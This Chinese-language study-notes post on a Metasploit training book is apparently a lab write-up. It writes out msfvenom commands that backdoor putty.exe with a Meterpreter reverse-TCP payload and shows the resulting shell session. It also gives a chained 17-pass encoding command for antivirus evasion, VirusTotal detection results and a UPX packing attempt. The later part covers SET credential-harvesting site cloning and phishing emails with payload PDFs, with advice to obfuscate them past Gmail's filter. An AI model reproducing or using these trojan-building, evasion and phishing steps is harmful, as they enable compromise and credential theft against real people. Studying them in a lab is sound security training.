《Metasploit魔鬼训练营》第七章学习笔记
P314 木马程序的制作
msfpayload和msfencoder已被msfvenom取代。使用msfvenom -h查看具体用法。以下网址也有相关教程:
https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom
将载荷windows/meterpreter/reverse_tcp绑定到putty.exe上,产生新绑定木马程序的可执行文件putty_backdoor.exe。
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.132 LPORT=80 -e x86/shikata_ga_nai -f exe -i 5 -x /root/example/putty.exe -k -o putty_backdoor.exe No platform was selected, choosing Msf::Module::Platform::Windows from the payload No Arch selected, selecting Arch: x86 from the payload Found 1 compatible encoders Attempting to encode payload with 5 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 360 (iteration=0) x86/shikata_ga_nai succeeded with size 387 (iteration=1) x86/shikata_ga_nai succeeded with size 414 (iteration=2) x86/shikata_ga_nai succeeded with size 441 (iteration=3) x86/shikata_ga_nai succeeded with size 468 (iteration=4) x86/shikata_ga_nai chosen with final size 468 Payload size: 468 bytes Saved as: putty_backdoor.exe
开启监听程序,在靶机上运行生成的putty_backdoor.exe,成功获得shell。
msf exploit(handler) > exploit [*] Started reverse TCP handler on 10.10.10.132:80 [*] Starting the payload handler... [*] Sending stage (957999 bytes) to 10.10.10.130 [*] Meterpreter session 1 opened (10.10.10.132:80 -> 10.10.10.130:3498) at 2016-04-05 20:36:32 +0800 meterpreter > sysinfo Computer : ROOT-TVI862UBEH OS : Windows .NET Server (Build 3790). Architecture : x86 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/win32
比较糗的就是即使在虚拟机上操作,我主机上的windows defender也经常会把我生成的恶意文件删掉。(只好暂时关掉)
实际中为了躲避杀毒软件的追杀,可以进行嵌套编码:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.132 LPORT=80 -a x86 --platform windows -e x86/shikata_ga_nai -i 5 <
-f raw | msfvenom -e x86/alpha_upper -a x86 --platform windows -i 2 -f raw | msfvenom -e x86/shikata_ga_nai -a x86 <
--platform windows -i 5 -f raw | msfvenom -e x86/countdown -a x86 --platform windows -i 5 -f exe -x /root/example/putty.exe <
-k -o /root/example/payload08.exe
算一算,经过x86/shikata_ga_nai编码5次,x86/alpha_upper编码2次,x86/shikata_ga_nai编码5次,x86/countdown编码5次,共17次!
为了试验下咱们文件的免疫力,上传到:
https://www.virustotal.com/en/
结果56个杀毒软件中有31个探测出来了,没探测出来的包括腾讯、金山、百度。。嘿嘿!
加壳“免杀”
root@kali:~/example# upx -6 -o putty_backdoor_upx6.exe putty_backdoor.exe Ultimate Packer for eXecutables Copyright (C) 1996 - 2013 UPX 3.91 Markus Oberhumer, Laszlo Molnar & John Reiser Sep 30th 2013 File size Ratio Format Name -------------------- ------ ----------- ----------- upx: putty_backdoor.exe: CantPackException: superfluous data between sections Packed 1 file: 0 ok, 1 error.
失败。网上并没有找到解决办法。
P326 钓鱼网站的制作:
打开SET,依次选择Social-Engineering Attacks->Website Attack Vectors->Credential Harvester Attack Method->Site Cloner,填入攻击机地址和克隆网页地址。记得要确保apache2服务已经开启!
靶机访问http://10.10.10.128/,输入帐号、密码后可以在攻击机中成功监听到:
P332 邮件钓鱼:
生成的pdf在目录/root/.set/里。按步骤做,最后选择使用gmail发送,结果失败:
大概是因为gmail探测出了附件中的payload了。所以最好是使用下msfencoder等做一些“免杀”处理!
